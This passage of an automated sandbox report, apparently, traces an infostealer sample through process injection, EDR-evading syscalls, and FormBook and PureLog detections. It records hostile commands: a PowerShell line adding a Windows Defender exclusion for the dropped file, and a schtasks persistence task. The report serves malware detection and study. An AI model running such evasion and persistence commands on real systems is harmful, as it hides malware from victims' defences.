                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BEA80 mov eax, dword ptr fs:[00000030h]7_2_012BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BEA80 mov eax, dword ptr fs:[00000030h]7_2_012BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BEA80 mov eax, dword ptr fs:[00000030h]7_2_012BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BEA80 mov eax, dword ptr fs:[00000030h]7_2_012BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BEA80 mov eax, dword ptr fs:[00000030h]7_2_012BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BEA80 mov eax, dword ptr fs:[00000030h]7_2_012BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384A80 mov eax, dword ptr fs:[00000030h]7_2_01384A80
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe"
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe"Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeNtTerminateThread: Direct from: 0x77377B2EJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\runas.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\runas.exeThread register set: target process: 1136Jump to behavior
                Uses runas.exe to run programs with evaluated privileges
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B87008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F86008Jump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374886895.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000000.2493595715.0000000001B11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374886895.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000000.2493595715.0000000001B11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374886895.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000000.2493595715.0000000001B11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374886895.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000000.2493595715.0000000001B11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Inquiry files v2.exeQueries volume information: C:\Users\user\Desktop\Inquiry files v2.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeQueries volume information: C:\Users\user\AppData\Roaming\WOzeoJQi.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WOzeoJQi.exe.27bdc94.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Inquiry files v2.exe.7630000.1.unpack, type: UNPACKEDPE
